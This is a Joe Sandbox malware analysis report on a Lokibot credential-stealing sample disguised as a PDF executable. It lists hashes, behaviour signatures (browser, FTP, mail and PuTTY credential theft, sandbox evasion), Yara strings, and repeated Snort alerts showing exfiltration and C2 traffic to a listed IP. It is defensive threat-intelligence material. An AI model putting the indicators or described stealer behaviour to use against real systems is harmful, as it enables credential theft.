Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report PI_Nov9071011998_ENTRUSTpdf.exe

Overview

General Information

Sample Name:PI_Nov9071011998_ENTRUSTpdf.exe
Analysis ID:326333
MD5:2349d50a67c2ef85661ef2be6def2cc3
SHA1:b0cfbb76140f37e483fa2ece9c790512e48f29d4
SHA256:9e196418dece3402ea9627106e6e246d5186392f25f8ada694598168481fb0bf
Tags:exeLoki

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM_3
Yara detected Lokibot
.NET source code contains potential unpacker
Found C&C like URL pattern
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Startup

  • System is w10x64
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmpLoki_1Loki Payloadkevoreilly
        • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
        • 0x153fc:$a2: last_compatible_version
        00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmpLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
        • 0x13bff:$des3: 68 03 66 00 00
        • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
        • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
        Click to see the 15 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
              1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.raw.unpackLoki_1Loki Payloadkevoreilly
              • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
              • 0x153fc:$a2: last_compatible_version
              1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.raw.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
              • 0x13bff:$des3: 68 03 66 00 00
              • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
              • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
              Click to see the 5 entries

              Sigma Overview

              No Sigma rule has matched

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Multi AV Scanner detection for submitted fileShow sources
              Source: PI_Nov9071011998_ENTRUSTpdf.exeVirustotal: Detection: 20%Perma Link
              Machine Learning detection for sampleShow sources
              Source: PI_Nov9071011998_ENTRUSTpdf.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,1_2_00403D74

              Networking:

              barindex
              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49709 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49709 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49709 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49709 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49709 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49710 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49710 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49710 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49710 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49710 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49711 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49711 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49711 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49711 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49711 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49711
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49712 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49712 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49712 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49712 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49712 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49712
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49713 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49713 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49713 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49713 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49713 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49713
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49714 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49714 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49714 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49714 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49714 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49714
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49715 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49715 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49715 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49715 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49715 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49715
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49716 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49716 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49716 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49716 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49716 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49716
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49717 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49717 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49717 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49717 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49717 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49717
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49718 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49718 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49718 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49718 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49718 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49718
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49719 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49719 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49719 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49719 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49719 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49719
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49720 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49720 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49720 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49720 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49720 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49720
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49721 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49721 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49721 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49721 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49721 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49721
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49722 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49722 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49722 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49722 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49722 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49722
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49723 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49723 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49723 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49723 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49723 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49723
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49724 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49724 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49724 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49724 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49724 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49724
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49725 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49725 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49725 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49725 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49725 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49725
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49726 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49726 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49726 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49726 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49726 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49726
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49727 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49727 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49727 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49727 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49727 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49727
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49728 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49728 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49728 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49728 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49728 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49728
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49729 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49729 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49729 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49729 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49729 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49729
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49730 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49730 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49730 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49730 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49730 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49730
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49731 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49731 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49731 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49731 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49731 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49731
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49734 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49734 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49734 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49734 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49734 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49734
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49735 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49735 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49735 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49735 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49735 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49735
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49736 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49736 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49736 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49736 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49736 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49736
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49739 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49739 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49739 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49739 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49739 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49739
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49740 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49740 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49740 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49740 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49740 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49740
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49742 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49742 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49742 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49742 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49742 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49742
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49743 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49743 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49743 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49743 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49743 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49743
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49744 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49744 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49744 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49744 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49744 -> 47.91.79.163:80
